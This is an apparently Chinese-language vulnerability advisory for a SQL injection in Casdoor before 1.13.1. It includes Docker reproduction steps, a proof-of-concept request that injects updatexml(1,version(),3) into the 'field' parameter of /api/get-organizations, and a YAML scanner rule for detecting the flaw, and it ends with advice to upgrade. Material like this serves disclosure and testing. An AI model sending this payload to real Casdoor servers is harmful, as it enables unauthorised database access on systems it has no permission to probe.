一、漏洞详情
Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台。此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞。
二、漏洞影响范围
Casdoor < Casdoor 1.13.1 //1.13.1版本之前均受影响
三、漏洞复现
拉取漏洞镜像
docker pull vulfocus/casdoor:1.13.0
启动环境
poc
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
tscan poc
params: []
name: "1"
set: {}
rules:
- method: GET
path: /api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status==200 && response.body.bcontains(b"beego")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""四、漏洞处置建议
尽快升级到最新版本。
请登录后查看回复内容